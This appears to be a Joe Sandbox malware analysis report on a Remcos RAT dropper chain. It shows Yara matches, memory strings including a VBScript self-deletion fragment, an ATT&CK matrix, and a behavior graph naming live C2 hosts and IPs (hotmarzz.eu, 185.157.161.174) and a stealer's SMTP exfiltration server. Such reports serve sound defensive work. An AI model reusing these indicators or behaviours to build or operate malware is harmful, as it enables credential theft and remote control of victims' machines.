                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.1.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a21bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.4031bf.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a21bf.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001D.00000002.730867358.00000000000E4000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.680253617.00000000000E4000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.929087269.00000000000E4000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684219433.0000000000D12000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.726305427.00000000000E4000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684299780.0000000000D0E000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.676858560.0000000000797000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
                    Detected Remcos RATShow sources
                    Source: xxTzyGLZx5.exe, 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
                    Source: xxTzyGLZx5.exe, 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceRemcos Agent initializedUserAccess Level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.3.2 Prov|
                    Source: xxTzyGLZx5.exe, 00000002.00000003.675040396.0000000002AD0000.00000004.00000001.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceRemcos Agent initializedUserAccess Level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.3.2 Prov|
                    Source: xxTzyGLZx5.exe, 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmpString found in binary or memory: Remcos_Mutex_Inj
                    Source: xxTzyGLZx5.exe, 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceRemcos Agent initializedUserAccess Level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.3.2 Prov|
                    Source: rem9090sta.exeString found in binary or memory: Remcos_Mutex_Inj
                    Source: rem9090sta.exe, 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmpString found in binary or memory: Remcos_Mutex_Inj
                    Source: rem9090sta.exe, 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceRemcos Agent initializedUserAccess Level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.3.2 Prov|
                    Source: rem9090sta.exe, 00000004.00000000.681886689.0000000000454000.00000002.00020000.sdmpString found in binary or memory: Remcos_Mutex_Inj
                    Source: rem9090sta.exe, 00000004.00000000.681886689.0000000000454000.00000002.00020000.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceRemcos Agent initializedUserAccess Level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.3.2 Prov|
                    Source: remcos.exe, 0000000D.00000002.932016894.0000000000454000.00000002.00020000.sdmpString found in binary or memory: Remcos_Mutex_Inj
                    Source: remcos.exe, 0000000D.00000002.932016894.0000000000454000.00000002.00020000.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceRemcos Agent initializedUserAccess Level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.3.2 Prov|
                    Source: remcos.exe, 0000000D.00000000.709586712.0000000000454000.00000002.00020000.sdmpString found in binary or memory: Remcos_Mutex_Inj
                    Source: remcos.exe, 0000000D.00000000.709586712.0000000000454000.00000002.00020000.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceRemcos Agent initializedUserAccess Level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.3.2 Prov|
                    Source: remcos.exe, 00000012.00000000.713254568.0000000000454000.00000002.00020000.sdmpString found in binary or memory: Remcos_Mutex_Inj
                    Source: remcos.exe, 00000012.00000000.713254568.0000000000454000.00000002.00020000.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceRemcos Agent initializedUserAccess Level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.3.2 Prov|
                    Source: remcos.exe, 00000012.00000002.715029583.0000000000757000.00000004.00000020.sdmpString found in binary or memory: Remcos_Mutex_Injrs\
                    Source: remcos.exe, 00000012.00000002.714713917.0000000000454000.00000002.00020000.sdmpString found in binary or memory: Remcos_Mutex_Inj
                    Source: remcos.exe, 00000012.00000002.714713917.0000000000454000.00000002.00020000.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceRemcos Agent initializedUserAccess Level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.3.2 Prov|
                    Source: remcos.exe, 0000001F.00000000.728375820.0000000000454000.00000002.00020000.sdmpString found in binary or memory: Remcos_Mutex_Inj
                    Source: remcos.exe, 0000001F.00000000.728375820.0000000000454000.00000002.00020000.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceRemcos Agent initializedUserAccess Level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.3.2 Prov|
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: cmd.exe4_2_004057A3

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation331Registry Run Keys / Startup Folder11Registry Run Keys / Startup Folder11Software Packing31OS Credential Dumping2System Time Discovery2Remote ServicesArchive Collected Data12Exfiltration Over Other Network MediumApplication Layer Protocol24Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                    Default AccountsShared Modules1LSASS Driver1LSASS Driver1Masquerading3Credentials in Registry1Account Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationEndpoint Denial of Service1
                    Domain AccountsScripting11Application Shimming1Application Shimming1Modify Registry1Credentials In Files3System Service Discovery1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationEncrypted Channel21Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsNative API11Windows Service21Access Token Manipulation1Hidden Files and Directories2Input Capture231File and Directory Discovery5Distributed Component Object ModelClipboard Data2Scheduled TransferNon-Standard Port1SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCommand and Scripting Interpreter112Network Logon ScriptWindows Service21Hidden Users2LSA SecretsSystem Information Discovery1410SSHInput Capture231Data Transfer Size LimitsRemote Access Software1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaService Execution2Rc.commonProcess Injection622Disable or Modify Tools11Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelNon-Application Layer Protocol3Jamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDeobfuscate/Decode Files or Information11DCSyncQuery Registry1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobScripting11Proc FilesystemSecurity Software Discovery281Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Obfuscated Files or Information21/etc/passwd and /etc/shadowVirtualization/Sandbox Evasion161Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Virtualization/Sandbox Evasion161Network SniffingProcess Discovery4Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                    Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronAccess Token Manipulation1Input CaptureApplication Window Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                    Compromise Software Supply ChainUnix ShellLaunchdLaunchdProcess Injection622KeyloggingRemote System Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                    Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskMasquerade Task or ServiceGUI Input CaptureSystem Network Configuration Discovery1Exploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 535501 Sample: xxTzyGLZx5.exe Startdate: 07/12/2021 Architecture: WINDOWS Score: 100 148 Malicious sample detected (through community Yara rule) 2->148 150 Antivirus detection for dropped file 2->150 152 Multi AV Scanner detection for dropped file 2->152 154 20 other signatures 2->154 10 remcos.exe 2->10         started        15 xxTzyGLZx5.exe 17 2->15         started        17 rdpvideominiport.sys 2->17         started        19 4 other processes 2->19 process3 dnsIp4 138 81.88.52.165, 443, 49738, 49739 REGISTER-ASIT Italy 10->138 140 192.168.2.1 unknown unknown 10->140 142 hotmarzz.eu 10->142 124 C:\Users\user\AppData\Roaming\...\dwn.exe, PE32 10->124 dropped 126 C:\Users\user\...\Droppertodownloa[1].exe, PE32 10->126 dropped 210 Detected unpacking (changes PE section rights) 10->210 212 Machine Learning detection for dropped file 10->212 214 Injects a PE file into a foreign processes 10->214 21 dwn.exe 10->21         started        25 remcos.exe 10->25         started        27 cmd.exe 10->27         started        31 2 other processes 10->31 128 C:\Users\user\AppData\Local\Temp\...\sozz.dll, PE32 15->128 dropped 29 xxTzyGLZx5.exe 3 15->29         started        file5 signatures6 process7 file8 114 C:\Users\user\AppData\Local\Temp\5.exe, PE32 21->114 dropped 116 C:\Users\user\AppData\Local\Temp\4.exe, PE32 21->116 dropped 118 C:\Users\user\AppData\Local\Temp\21.exe, PE32 21->118 dropped 192 Antivirus detection for dropped file 21->192 194 Machine Learning detection for dropped file 21->194 33 5.exe 21->33         started        37 4.exe 21->37         started        39 21.exe 21->39         started        196 Tries to steal Instant Messenger accounts or passwords 25->196 198 Tries to steal Mail credentials (via file / registry access) 25->198 200 Uses cmd line tools excessively to alter registry or file data 27->200 41 conhost.exe 27->41         started        43 reg.exe 27->43         started        120 C:\Users\user\AppData\...\rem9090sta.exe, PE32 29->120 dropped 122 C:\Users\user\AppData\Local\Temp\bin.exe, PE32 29->122 dropped 45 bin.exe 9 21 29->45         started        48 rem9090sta.exe 4 4 29->48         started        signatures9 process10 dnsIp11 90 C:\Users\user\AppData\Local\...\rgsbzeog.dll, PE32 33->90 dropped 156 Detected unpacking (creates a PE file in dynamic memory) 33->156 158 Machine Learning detection for dropped file 33->158 160 Injects a PE file into a foreign processes 33->160 50 5.exe 33->50         started        92 C:\Users\user\AppData\Local\Temp\...\kqkz.dll, PE32 37->92 dropped 162 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 37->162 164 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 37->164 53 4.exe 37->53         started        94 C:\Users\user\AppData\...\orwglwkinzb.dll, PE32 39->94 dropped 166 Writes or reads registry keys via WMI 39->166 57 21.exe 39->57         started        144 185.157.161.174, 1975, 49726, 49728 OBE-EUROPEObenetworkEuropeSE Sweden 45->144 146 hotmarzz.eu 195.110.124.154, 49727, 80 REGISTER-ASIT Italy 45->146 96 C:\Program Files\Microsoft DN1\sqlmap.dll, PE32+ 45->96 dropped 168 Antivirus detection for dropped file 45->168 170 Hides user accounts 45->170 172 Tries to steal Mail credentials (via file / registry access) 45->172 178 7 other signatures 45->178 59 powershell.exe 25 45->59         started        61 cmd.exe 1 45->61         started        98 C:\Users\user\AppData\Roaming\...\remcos.exe, PE32 48->98 dropped 100 C:\Users\user\AppData\Local\...\install.vbs, data 48->100 dropped 174 Creates multiple autostart registry keys 48->174 176 Contains functionality to steal Chrome passwords or cookies 48->176 180 3 other signatures 48->180 63 cmd.exe 1 48->63         started        65 wscript.exe 1 48->65         started        file12 signatures13 process14 dnsIp15 102 C:\Users\user\AppData\...\Windows Update.exe, PE32 50->102 dropped 67 Windows Update.exe 50->67         started        104 C:\Users\user\AppData\...\tmpG77.tmp (copy), PE32 53->104 dropped 202 Creates multiple autostart registry keys 53->202 136 smtp.privateemail.com 66.29.159.53, 465, 49765, 49767 ADVANTAGECOMUS United States 57->136 106 C:\Users\user\AppData\Roaming\...\sqlite3.dll, PE32 57->106 dropped 108 C:\Users\user\AppData\...\SQLite3_StdCall.dll, PE32 57->108 dropped 204 Tries to harvest and steal browser information (history, passwords, etc) 57->204 206 Tries to steal Crypto Currency Wallets 57->206 71 conhost.exe 59->71         started        73 conhost.exe 61->73         started        208 Uses cmd line tools excessively to alter registry or file data 63->208 75 conhost.exe 63->75         started        77 reg.exe 1 63->77         started        79 cmd.exe 65->79         started        file16 signatures17 process18 file19 112 C:\Users\user\AppData\Local\...\rgsbzeog.dll, PE32 67->112 dropped 190 Injects a PE file into a foreign processes 67->190 81 Windows Update.exe 67->81         started        86 conhost.exe 79->86         started        88 remcos.exe 79->88         started        signatures20 process21 dnsIp22 130 whatismyipaddress.com 104.16.154.36, 49769, 80 CLOUDFLARENETUS United States 81->130 132 127.0.0.1 unknown unknown 81->132 134 216.47.6.0.in-addr.arpa 81->134 110 C:\Users\user\AppData\...\WindowsUpdate.exe, PE32 81->110 dropped 182 Changes the view of files in windows explorer (hidden files and folders) 81->182 184 Creates multiple autostart registry keys 81->184 186 Writes to foreign memory regions 81->186 188 4 other signatures 81->188 file23 signatures24

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    xxTzyGLZx5.exe30%VirustotalBrowse

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\bin.exe100%AviraTR/Redcap.ghjpt
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Droppertodownloa[1].exe100%AviraTR/Dropper.Gen
                    C:\Users\user\AppData\Roaming\Remcos\dwn.exe100%AviraTR/Dropper.Gen
                    C:\Users\user\AppData\Local\Temp\rem9090sta.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\4.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\bin.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\WindowsUpdate.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Remcos\remcos.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Droppertodownloa[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\5.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Remcos\dwn.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Windows Update.exe100%Joe Sandbox ML
                    C:\Program Files\Microsoft DN1\sqlmap.dll25%MetadefenderBrowse
                    C:\Program Files\Microsoft DN1\sqlmap.dll46%ReversingLabsWin64.Trojan.RDPWrap
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Droppertodownloa[1].exe76%ReversingLabsWin32.Dropper.FrauDrop

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    35.2.dwn.exe.5af305.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                    40.0.5.exe.400000.6.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    40.0.5.exe.400000.6.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    3.0.bin.exe.d0000.0.unpack100%AviraTR/Redcap.ghjptDownload File
                    44.0.Windows Update.exe.415058.14.unpack100%AviraTR/Inject.vcoldiDownload File
                    40.1.5.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    40.1.5.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    43.2.Windows Update.exe.147b1458.3.unpack100%AviraTR/Inject.vcoldiDownload File
                    39.0.21.exe.400000.6.unpack100%AviraTR/Dropper.GenDownload File
                    44.2.Windows Update.exe.400000.2.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    44.2.Windows Update.exe.400000.2.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    33.2.remcos.exe.400000.0.unpack100%AviraHEUR/AGEN.1116590Download File
                    40.2.5.exe.3753258.5.unpack100%AviraTR/Inject.vcoldiDownload File
                    44.0.Windows Update.exe.400000.8.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    44.0.Windows Update.exe.400000.8.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    13.3.remcos.exe.295a000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                    41.0.4.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                    39.0.21.exe.400000.4.unpack100%AviraTR/Dropper.GenDownload File
                    40.0.5.exe.400000.9.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    40.0.5.exe.400000.9.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    44.1.Windows Update.exe.415058.2.unpack100%AviraTR/Inject.vcoldiDownload File
                    44.1.Windows Update.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    44.1.Windows Update.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    29.2.bin.exe.d0000.0.unpack100%AviraTR/Redcap.ghjptDownload File
                    39.0.21.exe.400000.7.unpack100%AviraTR/Dropper.GenDownload File
                    36.2.21.exe.14770000.1.unpack100%AviraTR/Dropper.GenDownload File
                    35.0.dwn.exe.5af305.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                    41.1.4.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    13.3.remcos.exe.295a000.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                    41.2.4.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                    40.2.5.exe.4970000.15.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    40.2.5.exe.4970000.15.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    44.0.Windows Update.exe.400000.6.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    44.0.Windows Update.exe.400000.6.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    39.0.21.exe.400000.5.unpack100%AviraTR/Dropper.GenDownload File
                    40.0.5.exe.400000.5.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    40.0.5.exe.400000.5.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    40.0.5.exe.400000.13.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    40.0.5.exe.400000.13.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    39.0.21.exe.400000.8.unpack100%AviraTR/Dropper.GenDownload File
                    44.0.Windows Update.exe.400000.7.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    44.0.Windows Update.exe.400000.7.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    44.2.Windows Update.exe.4b40000.16.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    44.2.Windows Update.exe.4b40000.16.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    40.0.5.exe.400000.7.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    40.0.5.exe.400000.7.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    37.2.5.exe.14901458.4.unpack100%AviraTR/Inject.vcoldiDownload File
                    35.0.dwn.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                    41.0.4.exe.400000.5.unpack100%AviraTR/Spy.Gen8Download File
                    41.0.4.exe.400000.11.unpack100%AviraTR/Spy.Gen8Download File
                    35.2.dwn.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                    35.2.dwn.exe.4df189.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                    40.0.5.exe.415058.15.unpack100%AviraTR/Inject.vcoldiDownload File
                    41.0.4.exe.400000.9.unpack100%AviraTR/Spy.Gen8Download File
                    35.0.dwn.exe.4df189.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                    1.2.xxTzyGLZx5.exe.147a0000.2.unpack100%AviraTR/Dropper.GenDownload File
                    39.1.21.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                    44.2.Windows Update.exe.415058.0.unpack100%AviraTR/Inject.vcoldiDownload File
                    41.0.4.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                    13.3.remcos.exe.29f3000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    32.2.remcos.exe.400000.0.unpack100%AviraHEUR/AGEN.1116590Download File
                    44.0.Windows Update.exe.400000.13.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    44.0.Windows Update.exe.400000.13.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    40.2.5.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
